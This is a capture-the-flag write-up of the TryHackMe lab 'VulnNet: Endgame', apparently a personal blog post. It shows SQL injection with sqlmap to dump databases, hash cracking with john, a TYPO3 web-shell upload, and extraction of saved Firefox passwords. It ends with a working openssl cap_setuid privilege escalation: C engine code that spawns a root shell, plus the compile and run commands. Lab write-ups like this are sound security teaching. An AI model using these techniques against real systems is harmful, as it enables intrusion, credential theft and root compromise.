CTF : VulnNet: Endgame

CTF VulnNet: Endgame writeup. Source THM. Announced difficulty level: Medium

Posted by Boula-Bytes on 30 September 2022

CTF : VulnNet: Endgame

Informations

  • IP: 10.10.73.164
  • MYIP: 10.8.16.133

First enumeration

Basics

  • NMAP
console
$ sudo nmap -p- 10.10.73.164
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-29 22:46 CEST
Nmap scan report for 10.10.73.164
Host is up (0.038s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 47.65 seconds

Vulnerabilities search

I added vulnnet.thm to my /etc/hosts because ip address lead to an html page telling all services were handeled by vulnnet.thm domain.

http://vulnnet.thm shows a countdown website...

First I used dirsearch to see if I could find something interresting.

I found a .DS_Store ...

console
dirsearch -u http://vulnnet.thm/js/

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /home/boula/.dirsearch/reports/vulnnet.thm/-js-_22-09-29_22-55-59.txt

Error Log: /home/boula/.dirsearch/logs/errors-22-09-29_22-55-59.log

Target: http://vulnnet.thm/js/

[22:55:59] Starting: 
[22:56:00] 200 -    6KB - /js/.DS_Store

But there were only js files.

So I decided to search for possible vhosts : 

console
$ gobuster vhost -u http://vulnnet.thm -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:          http://vulnnet.thm
[+] Method:       GET
[+] Threads:      10
[+] Wordlist:     /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
[+] User Agent:   gobuster/3.1.0
[+] Timeout:      10s
===============================================================
2022/09/29 23:11:55 Starting gobuster in VHOST enumeration mode
===============================================================
Found: blog.vulnnet.thm (Status: 200) [Size: 19316]
Found: shop.vulnnet.thm (Status: 200) [Size: 26701]
Found: api.vulnnet.thm (Status: 200) [Size: 18]    
Found: admin1.vulnnet.thm (Status: 307) [Size: 0]

Ok let's add them to /etc/hosts :)

On blog host we can find this call :

http://api.vulnnet.thm/vn_internals/api/v2/fetch/?blog=1

Exploit

Using sqlmap I managed to find that this host vulnerable to SQLI

So I also used sqlmap to dump databases : 

shell
sqlmap -u "http://api.vulnnet.thm/vn_internals/api/v2/fetch/?blog=1" --level=5 --risk=3 --dump-all

I downloaded two databases, blog and vn_admin.

For vn_admin content is base64 encoded. Using manual decoding I finally found this information : 

1||0|1655226789|0|0|0|0|0|chris_w@vulnnet.thm|0||1655226810||0|$argon2i$v=19$m=65536,t=16,p=2$UnlVSEgyMUFnYnJXNXlXdg$j6z3IshmjsN+CwhciRECV2NArQwipqQMIBtYufyM4Rg|0||0|1655226789|a:14:{s:14:"interfaceSetup";s:7:"backend";s:10:"moduleData";a:1:{s:32:"web_dashboard/current_dashboard/";s:40:"e5f1f8ea7b30afe7e4024c15b606a6fcb501a631";}s:19:"thumbnailsByDefault";i:1;s:14:"emailMeAtLogin";i:0;s:11:"startModule";s:13:"web_dashboard";s:8:"titleLen";i:50;s:8:"edit_RTE";s:1:"1";s:20:"edit_docModuleUpload";s:1:"1";s:15:"resizeTextareas";i:1;s:25:"resizeTextareas_MaxHeight";i:500;s:24:"resizeTextareas_Flexible";i:0;s:4:"lang";s:0:"";s:19:"firstLoginTimeStamp";i:1655226810;s:15:"moduleSessionID";a:1:{s:32:"web_dashboard/current_dashboard/";s:32:"773e00fbb960a0ba87ad8c39f3c4a691";}}|1||chris_w|0|1

I got an user and a hash

chris_w:$argon2i$v=19$m=65536,t=16,p=2$UnlVSEgyMUFnYnJXNXlXdg$j6z3IshmjsN+CwhciRECV2NArQwipqQMIBtYufyM4Rg

The users table from blog database contains a lot of users/password so I extracted the passwords to use them as a wordlist whith john.

shell
cat users.csv| cut -d "," -f 3 > ~/CTF/VulnNet_Endgame/userlist.txt

Then I used john to crack chris_w password : 

shell
john ./hash.txt --wordlist=./passlist.txt

And it works :

xxxxxxxxxxx (chris_w)

From there, I connected into typo3 as chris_w and gone to admin section and allow php files upload.

I uploaded a shell file and use interface to show it.

And then I got a shell :)

I had to own the user called system. I found a logins.json into a firefox profile... seems we can retrieve informations from there.

I made an archive of .mozilla dir and downloaded it.

Then I used a python tool to retrieve informations :

git clone https://github.com/unode/firefox_decrypt.git

console
python3 firefox_decrypt.py ../tmp/.mozilla/firefox/
Select the Mozilla profile you wish to decrypt
1 -> 2fjnrwth.default-release
2 -> 2o9vd4oi.default
3 -> 8mk7ix79.default-release
1

Website:   https://tryhackme.com
Username: 'chris_w@vulnnet.thm'
Password: 'xxxxxxxxxxxxxxxxxx'

I used ssh to connect to have a more stable shell. ;)

Privilege escalation

Enumeration for privesc

Running this :

shell
getcap -r / 2>/dev/null

lead me to this : 

console
/home/system/Utils/openssl =ep

I found a blog post that explains what to do with this :

https://chaudhary1337.github.io/p/how-to-openssl-cap_setuid-ep-privesc-exploit/

Exploit

Basically I needed to compile on my box a library based on that code : 

c
#include <openssl/engine.h>

static int bind(ENGINE *e, const char *id)
{
  setuid(0); setgid(0);
  system("/bin/bash");
}

IMPLEMENT_DYNAMIC_BIND_FN(bind)
IMPLEMENT_DYNAMIC_CHECK_FN()
shell
gcc -fPIC -o exploit.o -c exploit.c
gcc -shared -o exploit.so -lcrypto exploit.o
scp exploit.so system@10.10.73.164:/tmp/

Then, on the target box : 

shell
/home/system/Utils/openssl req -engine /tmp/exploit.so
console
# whoami
root
# cat /root/thm-flag/root.txt

\o/